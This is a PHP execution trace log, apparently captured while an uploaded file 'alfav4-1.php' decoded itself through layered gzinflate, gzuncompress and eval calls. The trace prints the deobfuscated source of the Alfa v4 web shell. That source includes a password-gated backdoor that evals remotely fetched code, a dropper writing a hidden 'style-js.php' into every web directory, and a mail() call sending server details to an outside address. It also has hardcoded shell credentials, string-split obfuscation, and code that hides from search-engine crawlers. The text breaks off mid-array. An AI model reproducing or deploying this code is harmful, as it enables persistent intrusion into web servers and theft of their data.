3	12	0	0.014737	712376	gzinflate	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code	1	1	'\0007��x�\0007��x��{_�ʲ0����o�L�{�-r��\f:�x\033��u��\004\b\020\005�$AD�糿U��I\'\004�Y��9���{\t��������z���?�ٺm\033f�j;��Dc\005H�-˴���7-�赢)L\rM�Ӕ�\022��M)��k��\004�^ K���m�J\027�c�嘆��eO;��=��s�p�k�.^N\r_��6�O׺GO�������~e/7!�_���7�g�Y~�t�_n+7���Y�&��=\a�v�R��~�ap\030w\032K��b����������E�@Å�w4G�Q\027\037�����rz��p�h�\036�K�a��|��չj=.\037Y������M�e���<�]/^�\036�;ͦ=Ho-�8ͣ�ݍ�C���tv쓇��|����_\017��닝��y{k��foo�pP�\\�����ݫ���7\036.\032G�zvi�⦛]ܱ��J��MZ�Z-]r�~���(k4��\037���{'
3	12	1	0.017190	847576
3	12	R			'x�\0007��x��{_�ʲ0����o�L�{�-r��\f:�x\033��u��\004\b\020\005�$AD�糿U��I\'\004�Y��9���{\t��������z���?�ٺm\033f�j;��Dc\005H�-˴���7-�赢)L\rM�Ӕ�\022��M)��k��\004�^ K���m�J\027�c�嘆��eO;��=��s�p�k�.^N\r_��6�O׺GO�������~e/7!�_���7�g�Y~�t�_n+7���Y�&��=\a�v�R��~�ap\030w\032K��b����������E�@Å�w4G�Q\027\037�����rz��p�h�\036�K�a��|��չj=.\037Y������M�e���<�]/^�\036�;ͦ=Ho-�8ͣ�ݍ�C���tv쓇��|����_\017��닝��y{k��foo�pP�\\�����ݫ���7\036.\032G�zvi�⦛]ܱ��J��MZ�Z-]r�~���(k4��\037���{����M��'
3	13	0	0.019605	712376	gzuncompress	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code	1	1	'x�\0007��x��{_�ʲ0����o�L�{�-r��\f:�x\033��u��\004\b\020\005�$AD�糿U��I\'\004�Y��9���{\t��������z���?�ٺm\033f�j;��Dc\005H�-˴���7-�赢)L\rM�Ӕ�\022��M)��k��\004�^ K���m�J\027�c�嘆��eO;��=��s�p�k�.^N\r_��6�O׺GO�������~e/7!�_���7�g�Y~�t�_n+7���Y�&��=\a�v�R��~�ap\030w\032K��b����������E�@Å�w4G�Q\027\037�����rz��p�h�\036�K�a��|��չj=.\037Y������M�e���<�]/^�\036�;ͦ=Ho-�8ͣ�ݍ�C���tv쓇��|����_\017��닝��y{k��foo�pP�\\�����ݫ���7\036.\032G�zvi�⦛]ܱ��J��MZ�Z-]r�~���(k4��\037���{����M��'
3	13	1	0.022117	847576
3	13	R			'x��{_�ʲ0����o�L�{�-r��\f:�x\033��u��\004\b\020\005�$AD�糿U��I\'\004�Y��9���{\t��������z���?�ٺm\033f�j;��Dc\005H�-˴���7-�赢)L\rM�Ӕ�\022��M)��k��\004�^ K���m�J\027�c�嘆��eO;��=��s�p�k�.^N\r_��6�O׺GO�������~e/7!�_���7�g�Y~�t�_n+7���Y�&��=\a�v�R��~�ap\030w\032K��b����������E�@Å�w4G�Q\027\037�����rz��p�h�\036�K�a��|��չj=.\037Y������M�e���<�]/^�\036�;ͦ=Ho-�8ͣ�ݍ�C���tv쓇��|����_\017��닝��y{k��foo�pP�\\�����ݫ���7\036.\032G�zvi�⦛]ܱ��J��MZ�Z-]r�~���(k4��\037���{����M���������'
3	14	0	0.024572	712376	gzuncompress	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code	1	1	'x��{_�ʲ0����o�L�{�-r��\f:�x\033��u��\004\b\020\005�$AD�糿U��I\'\004�Y��9���{\t��������z���?�ٺm\033f�j;��Dc\005H�-˴���7-�赢)L\rM�Ӕ�\022��M)��k��\004�^ K���m�J\027�c�嘆��eO;��=��s�p�k�.^N\r_��6�O׺GO�������~e/7!�_���7�g�Y~�t�_n+7���Y�&��=\a�v�R��~�ap\030w\032K��b����������E�@Å�w4G�Q\027\037�����rz��p�h�\036�K�a��|��չj=.\037Y������M�e���<�]/^�\036�;ͦ=Ho-�8ͣ�ݍ�C���tv쓇��|����_\017��닝��y{k��foo�pP�\\�����ݫ���7\036.\032G�zvi�⦛]ܱ��J��MZ�Z-]r�~���(k4��\037���{����M���������'
3	14	1	0.028375	1183448
3	14	R			'<?php\r\n@session_start();\r\n@error_reporting(0);\r\nerror_reporting(0);\r\n$a = \'<?php phpinfo();\r\n\r\n$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";\r\n$gzinflate = "=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/'
3	15	0	0.039477	3445368	eval	1	'?><?php\r\n@session_start();\r\n@error_reporting(0);\r\nerror_reporting(0);\r\n$a = \'<?php phpinfo();\r\n\r\n$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";\r\n$gzinflate = "=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJcosuAHEtpAimJmdmoFCB2NZlgqVobRLXemwlekB8PSBazZLFbIHPfRsqapn5Z2WFCGLcWb5Ls9hJahXA7YV+RHfRiYvgTQpUFHyk8tcxG2ovhQOTquhQ66yaMV9H6FEhemC6vu7woIlYFCFlmOADdmcnyI39588cbGYIw42qSs//TI4HhYD0z0ItUW6T0Zs4GozL1SjnL3tNWA5gc9D9v0HFwI8adFVbcin/sGwUBwJe+HaAeFg/cGwYB4/lBgWA";\r\neval(htmlspecialchars_decode(urldecode(base64_decode($gz))));\r\n?>\r\n\r\n\';\r\n\r\nif (@$_REQUEST["px"]) {\r\n    $p = @$_REQUEST["px"];\r\n    $pa = md5(sha1($p));\r\n    if ($pa == "013f0a41203c0ad0f68033f4a53c7e6d") {\r\n        echo eval(@file_get_contents(@$_REQUEST["404"]));\r\n    }\r\n}\r\nif (@!$_SESSION["sdm"]) {\r\n    $doc = $_SERVER["DOCUMENT_ROOT"];\r\n    $dir = scandir($doc);\r\n    $d1 = \'\' . $doc . \'/.\';\r\n    $d2 = \'\' . $doc . \'/..\';\r\n    if (($key = @array_search(\'.\', $dir)) !== false) {\r\n        unset($dir[$key]);\r\n    }\r\n    if (($key = @array_search(\'..\', $dir)) !== false) {\r\n        unset($dir[$key]);\r\n    }\r\n    if (($key = @array_search($d1, $dir)) !== false) {\r\n        unset($dir[$key]);\r\n    }\r\n    if (($key = array_search($d2, $dir)) !== false) {\r\n        unset($dir[$key]);\r\n    }\r\n    @array_push($dir, $doc);\r\n    foreach ($dir as $d) {\r\n        $p = $doc . "/" . $d;\r\n        if (is_dir($p)) {\r\n            $file = $p . "/style-js.php";\r\n            @touch($file);\r\n            $folder = @fopen($file, "w");\r\n            @fwrite($folder, $a);\r\n        }\r\n    }\r\n\r\n}\r\n?>\r\n<?php\r\n\r\n\r\n\r\n$b = "Alfa v4";\r\n$c = ": " . $_SERVER[\'DOCUMENT_ROOT\'] . "\r\n";\r\n$c.= " : " . $_SERVER[\'SERVER_ADMIN\'] . "\r\n";\r\n$c.= " : " . $_SERVER[\'SERVER_SOFTWARE\'] . "\r\n";\r\n$c.= ": http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'PHP_SELF\'] . "\r\n";\r\n$c.= ": " . $_SERVER[\'HTTP_HOST\'] . "\r\n";\r\nmail("shelldownloadorg@gmail.com", $b, $c);\r\n\r\n?>\r\n<?php\r\n/*\r\n\tAuthor: \tSolevisible/Alfa-Team\r\n\tTelegram: \thttps://telegram.me/solevisible\r\n\tYouTube: \thttps://youtube.com/solevisible\r\n\tGmail:\t\tsolevisible@gmail.com\r\n\tDate:\t\tMonday, September 14, 2020\r\n*/\r\n$GLOBALS[\'oZgNypoPRU\'] = array(\r\n    \'username\' => \'alfa\',\r\n    \'password\' => \'7fda3b84fdea259e352fee85c8523239\',//md5(hackershells.org)\r\n    \'safe_mode\' => \'1\',\r\n    \'login_page\' => \'403\',\r\n    \'show_icons\' => \'1\',\r\n    \'post_encryption\' => false,\r\n    \'cgi_api\' => true,\r\n);\r\n\r\n$CWppUDJxuf = \'fu\' . \'n\' . \'ct\' . \'ion_\' . \'e\' . \'xist\' . \'s\';\r\n$aztJtafUXm = \'cha\' . \'r\' . \'C\' . \'o\' . \'d\' . \'e\' . \'A\' . \'t\' . \'\';\r\n$OVpGNqqFZs = \'e\' . \'v\' . \'al\';\r\n$psDEwGhsxg = \'gz\' . \'inf\' . \'late\';\r\n\r\nif (!$CWppUDJxuf(\'b\' . \'a\' . \'se64\' . \'_en\' . \'c\' . \'ode\' . \'\'))\r\n{\r\n    function vcnvSCZgBz($data)\r\n    {\r\n        if (empty($data)) return;\r\n        $b64 = \'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\';\r\n        $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;\r\n        $ac = 0;\r\n        $enc = \'\';\r\n        $tmp_arr = array();\r\n        if (!$data)\r\n        {\r\n            return $data;\r\n        }\r\n        do\r\n        {\r\n            $o1 = $aztJtafUXm($data, $i++);\r\n            $o2 = $aztJtafUXm($data, $i++);\r\n            $o3 = $aztJtafUXm($data, $i++);\r\n            $bits = $o1 << 16 | $o2 << 8 | $o3;\r\n            $h1 = $bits >> 18 & 0x3f;\r\n            $h2 = $bits >> 12 & 0x3f;\r\n            $h3 = $bits >> 6 & 0x3f;\r\n            $h4 = $bits & 0x3f;\r\n            $tmp_arr[$ac++] = charAt($b64, $h1) . charAt($b64, $h2) . charAt($b64, $h3) . charAt($b64, $h4);\r\n        }\r\n        while ($i < strlen($data));\r\n        $enc = implode($tmp_arr, \'\');\r\n        $r = (strlen($data) % 3);\r\n        return ($r ? substr($enc, 0, ($r - 3)) : $enc) . substr(\'===\', ($r || 3));\r\n    }\r\n    function charCodeAt($data, $char)\r\n    {\r\n        return ord(substr($data, $char, 1));\r\n    }\r\n    function charAt($data, $char)\r\n    {\r\n        return substr($data, $char, 1);\r\n    }\r\n}\r\nelse\r\n{\r\n    function vcnvSCZgBz($s)\r\n    {\r\n        $b = \'b\' . \'a\' . \'se64\' . \'_en\' . \'c\' . \'ode\' . \'\';\r\n        return $b($s);\r\n    }\r\n}\r\nif (!$CWppUDJxuf(\'b\' . \'a\' . \'se\' . \'6\' . \'4\' . \'_d\' . \'ecod\' . \'e\' . \'\'))\r\n{\r\n    function zRtSHsbTzV($input)\r\n    {\r\n        if (empty($input)) return;\r\n        $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";\r\n        $chr1 = $chr2 = $chr3 = "";\r\n        $enc1 = $enc2 = $enc3 = $enc4 = "";\r\n        $i = 0;\r\n        $output = "";\r\n        $input = preg_replace("[^A-Za-z0-9\\+\\/\\=]", "", $input);\r\n        do\r\n        {\r\n            $enc1 = strpos($keyStr, substr($input, $i++, 1));\r\n            $enc2 = strpos($keyStr, substr($input, $i++, 1));\r\n            $enc3 = strpos($keyStr, substr($input, $i++, 1));\r\n            $enc4 = strpos($keyStr, substr($input, $i++, 1));\r\n            $chr1 = ($enc1 << 2) | ($enc2 >> 4);\r\n            $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);\r\n            $chr3 = (($enc3 & 3) << 6) | $enc4;\r\n            $output = $output . chr((int)$chr1);\r\n            if ($enc3 != 64)\r\n            {\r\n                $output = $output . chr((int)$chr2);\r\n            }\r\n            if ($enc4 != 64)\r\n            {\r\n                $output = $output . chr((int)$chr3);\r\n            }\r\n            $chr1 = $chr2 = $chr3 = "";\r\n            $enc1 = $enc2 = $enc3 = $enc4 = "";\r\n        }\r\n        while ($i < strlen($input));\r\n        return $output;\r\n    }\r\n}\r\nelse\r\n{\r\n    function zRtSHsbTzV($s)\r\n    {\r\n        $b = \'b\' . \'a\' . \'se\' . \'6\' . \'4\' . \'_d\' . \'ecod\' . \'e\' . \'\';\r\n        return $b($s);\r\n    }\r\n}\r\n\r\nfunction __ZW5jb2Rlcg($s)\r\n{\r\n    return vcnvSCZgBz($s);\r\n}\r\nfunction __ZGVjb2Rlcg($s)\r\n{\r\n    return zRtSHsbTzV($s);\r\n}\r\n\r\n$GLOBALS[\'DB_NAME\'] = $GLOBALS[\'oZgNypoPRU\'];\r\n\r\nforeach ($GLOBALS[\'DB_NAME\'] as $key => $value)\r\n{\r\n\t$prefix = substr($key, 0, 2);\r\n\tif ($prefix == "us")\r\n\t{\r\n\t\t$GLOBALS[\'DB_NAME\']["user"] = $value;\r\n\t\t$GLOBALS[\'DB_NAME\']["user_rand"] = $key;\r\n\t}\r\n\telseif ($prefix == "pa")\r\n\t{\r\n\t\t$GLOBALS[\'DB_NAME\']["pass"] = $value;\r\n\t\t$GLOBALS[\'DB_NAME\']["pass_rand"] = $key;\r\n\t}\r\n\telseif ($prefix == "sa")\r\n\t{\r\n\t\t$GLOBALS[\'DB_NAME\']["safemode"] = $value;\r\n\t\t$GLOBALS[\'DB_NAME\']["safemode_rand"] = $key;\r\n\t}\r\n\telseif ($prefix == "lo")\r\n\t{\r\n\t\t$GLOBALS[\'DB_NAME\']["login_page"] = $value;\r\n\t\t$GLOBALS[\'DB_NAME\']["login_page_rand"] = $key;\r\n\t}\r\n\telseif ($prefix == "sh")\r\n\t{\r\n\t\t$GLOBALS[\'DB_NAME\']["show_icons"] = $value;\r\n\t\t$GLOBALS[\'DB_NAME\']["show_icons_rand"] = $key;\r\n\t}\r\n\telseif ($prefix == "po")\r\n\t{\r\n\t\t$GLOBALS[\'DB_NAME\']["post_encryption"] = $value;\r\n\t\t$GLOBALS[\'DB_NAME\']["post_encryption_rand"] = $key;\r\n\t}\r\n\telseif ($prefix == "cg")\r\n\t{\r\n\t\t$GLOBALS[\'DB_NAME\']["cgi_api"] = $value;\r\n\t\t$GLOBALS[\'DB_NAME\']["cgi_api_rand"] = $key;\r\n\t}\r\n}\r\n\r\nunset($GLOBALS[\'oZgNypoPRU\']);\r\n\r\nif (!isset($_SERVER["HTTP_HOST"])) exit();\r\n\r\nif(!empty($_SERVER[\'HTTP_USER_AGENT\'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match(\'/\'.implode(\'|\',$userAgents).\'/i\',$_SERVER[\'HTTP_USER_AGENT\'])){header(\'HTTP/1.0 404 Not Found\');exit;}}\r\nif(!isset($GLOBALS[\'DB_NAME\'][\'user\']))exit(\'$GLOBALS[\\\'DB_NAME\\\'][\\\'user\\\']\');\r\nif(!isset($GLOBALS[\'DB_NAME\'][\'pass\']))exit(\'$GLOBALS[\\\'DB_NAME\\\'][\\\'pass\\\']\');\r\nif(!isset($GLOBALS[\'DB_NAME\'][\'safemode\']))exit(\'$GLOBALS[\\\'DB_NAME\\\'][\\\'safemode\\\']\');\r\nif(!isset($GLOBALS[\'DB_NAME\'][\'login_page\']))exit(\'$GLOBALS[\\\'DB_NAME\\\'][\\\'login_page\\\']\');\r\nif(!isset($GLOBALS[\'DB_NAME\'][\'show_icons\']))exit(\'$GLOBALS[\\\'DB_NAME\\\'][\\\'show_icons\\\']\');\r\nif(!isset($GLOBALS[\'DB_NAME\'][\'post_encryption\']))exit(\'$GLOBALS[\\\'DB_NAME\\\'][\\\'post_encryption\\\']\');\r\ndefine("__ALFA_VERSION__", "4.1");\r\ndefine("__ALFA_UPDATE__", "2");\r\ndefine("__ALFA_CODE_NAME__", "Tesla");\r\ndefine("__ALFA_DATA_FOLDER__", "ALFA_DATA");\r\ndefine("__ALFA_POST_ENCRYPTION__", (isset($GLOBALS["DB_NAME"]["post_encryption"])&&$GLOBALS["DB_NAME"]["post_encryption"]==true?true:false));\r\ndefine("__ALFA_SECRET_KEY__", __ALFA_POST_ENCRYPTION__?_AlfaSecretKey():\'\');\r\n$GLOBALS[\'__ALFA_COLOR__\'] = array(\r\n\t\t"shell_border" => array(\r\n\t\t\t"key_color" => "#0E304A",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".header" => "border: 7px solid {color}",\r\n\t\t\t\t"#meunlist" => "border-color: {color}",\r\n\t\t\t\t"#hidden_sh" => "background-color: {color}",\r\n\t\t\t\t".ajaxarea" => "border: 1px solid {color}",\r\n\t\t\t\t".foot" => "border-color: {color}",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"header_vars" => "#27979B",\r\n\t\t"header_values" => "#67ABDF",\r\n\t\t"header_on" => "#00FF00",\r\n\t\t"header_off" => "#ff0000",\r\n\t\t"header_none" => "#00FF00",\r\n\t\t"home_shell" => "#ff0000",\r\n\t\t"home_shell:hover" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".home_shell:hover" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"back_shell" => "#efbe73",\r\n\t\t"back_shell:hover" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".back_shell:hover" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"header_pwd" => "#00FF00",\r\n\t\t"header_pwd:hover" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".header_pwd:hover" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"header_drive" => "#00FF00",\r\n\t\t"header_drive:hover" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".header_drive:hover" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"header_show_all" => "#00FF00",\r\n\t\t"disable_functions" => "#ff0000",\r\n\t\t"footer_text" => "#27979B",\r\n\t\t"menu_options" => "#27979B",\r\n\t\t"menu_options:hover" => array(\r\n\t\t\t"key_color" => "#646464",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".menu_options:hover" => "background-color: {color};font-weight: unset;",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"options_list" => array(\r\n\t\t\t"key_color" => "#00FF00",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".content_options_holder .header center a" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"options_list:hover" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".content_options_holder .header center a:hover" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"options_list_header" => array(\r\n\t\t\t"key_color" => "#59cc33",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".txtfont_header" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"options_list_text" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".txtfont,.tbltxt" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"Alfa+" => array(\r\n\t\t\t"key_color" => "#06ff0f",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".alfa_plus" => "color: {color};font-weight: unset;",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"hidden_shell_text" => array(\r\n\t\t\t"key_color" => "#00FF00",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t"#hidden_sh a" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"hidden_shell_version" => "#ff0000",\r\n\t\t"shell_name" => "#FF0000",\r\n\t\t"main_row:hover" => array(\r\n\t\t\t"key_color" => "#646464",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".main tr:hover" => "background-color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"main_header" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".main th" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"main_name" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".main .main_name" => "color: {color};font-weight: unset;",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"main_size" => "#67ABDF",\r\n\t\t"main_modify" => "#67ABDF",\r\n\t\t"main_owner_group" => "#67ABDF",\r\n\t\t"main_green_perm" => "#25ff00",\r\n\t\t"main_red_perm" => "#FF0000",\r\n\t\t"main_white_perm" => "#FFFFFF",\r\n\t\t"beetween_perms" => "#FFFFFF",\r\n\t\t"main_actions" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".main .actions" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"menu_options:hover" => array(\r\n\t\t\t"key_color" => "#646464",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".menu_options:hover" => "background-color: {color};font-weight: unset;",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"minimize_editor_background" => array(\r\n\t\t\t"key_color" => "#0e304a",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".minimized-wrapper" => "background-color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"minimize_editor_text" => array(\r\n\t\t\t"key_color" => "#f5deb3",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".minimized-text" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_border" => array(\r\n\t\t\t"key_color" => "#0e304a",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".editor-explorer,.editor-modal" => "border: 2px solid {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_background" => array(\r\n\t\t\t"key_color" => "rgba(0, 1, 23, 0.94)",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".editor-explorer,.editor-modal" => "background-color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_header_background" => array(\r\n\t\t\t"key_color" => "rgba(21, 66, 88, 0.93)",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".editor-header" => "background-color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_header_text" => array(\r\n\t\t\t"key_color" => "#00ff7f",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".editor-path" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_header_button" => array(\r\n\t\t\t"key_color" => "#1d5673",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".close-button, .editor-minimize" => "background-color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_actions" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".editor_actions" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_file_info_vars" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".editor_file_info_vars" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_file_info_values" => array(\r\n\t\t\t"key_color" => "#67ABDF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".filestools" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_history_header" => array(\r\n\t\t\t"key_color" => "#14ff07",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".hheader-text,.history-clear" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_history_list" => array(\r\n\t\t\t"key_color" => "#03b3a3",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".editor-file-name" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_history_selected_file" => array(\r\n\t\t\t"key_color" => "rgba(49, 55, 93, 0.77)",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".is_active" => "background-color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"editor_history_file:hover" => array(\r\n\t\t\t"key_color" => "#646464",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".file-holder > .history:hover" => "background-color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"input_box_border" => array(\r\n\t\t\t"key_color" => "#0E304A",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t"input[type=text],textarea" => "border: 1px solid {color}",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"input_box_text" => array(\r\n\t\t\t"key_color" => "#999999",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t"input[type=text],textarea" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"input_box:hover" => array(\r\n\t\t\t"key_color" => "#27979B",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t"input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"select_box_border" => array(\r\n\t\t\t"key_color" => "#0E304A",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t"select" => "border: 1px solid {color}",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"select_box_text" => array(\r\n\t\t\t"key_color" => "#FFFFEE",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t"select" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"select_box:hover" => array(\r\n\t\t\t"key_color" => "#27979B",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t"select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"button_border" => array(\r\n\t\t\t"key_color" => "#27979B",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t"input[type=submit],.button,#addup" => "border: 1px solid {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"button:hover" => array(\r\n\t\t\t"key_color" => "#27979B",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t"input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};",\r\n\t\t\t\t".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"outputs_text" => array(\r\n\t\t\t"key_color" => "#67ABDF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".ml1" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"outputs_border" => array(\r\n\t\t\t"key_color" => "#0E304A",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".ml1" => "border: 1px solid {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"uploader_border" => array(\r\n\t\t\t"key_color" => "#0E304A",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"uploader_background" => array(\r\n\t\t\t"key_color" => "#0E304A",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".inputfile strong" => "background-color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"uploader_text_right" => array(\r\n\t\t\t"key_color" => "#FFFFFF",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".inputfile strong" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"uploader_text_left" => array(\r\n\t\t\t"key_color" => "#25ff00",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".inputfile span" => "color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"uploader:hover" => array(\r\n\t\t\t"key_color" => "#27979B",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"uploader_progress_bar" => array(\r\n\t\t\t"key_color" => "#00ff00",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t".up_bar" => "background-color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"mysql_tables" => "#00FF00",\r\n\t\t"mysql_table_count" => "#67ABDF",\r\n\t\t"copyright" => "#dfff00",\r\n\t\t"scrollbar" => array(\r\n\t\t\t"key_color" => "#1e82b5",\r\n\t\t\t"multi_selector" => array(\r\n\t\t\t\t"*::-webkit-scrollbar-thumb" => "background-color: {color};",\r\n\t\t\t)\r\n\t\t),\r\n\t\t"scrollbar_background" => array(\r\n\t\t\t"key_color" => "#000115",\r\n\t\t\t"multi_selector" => 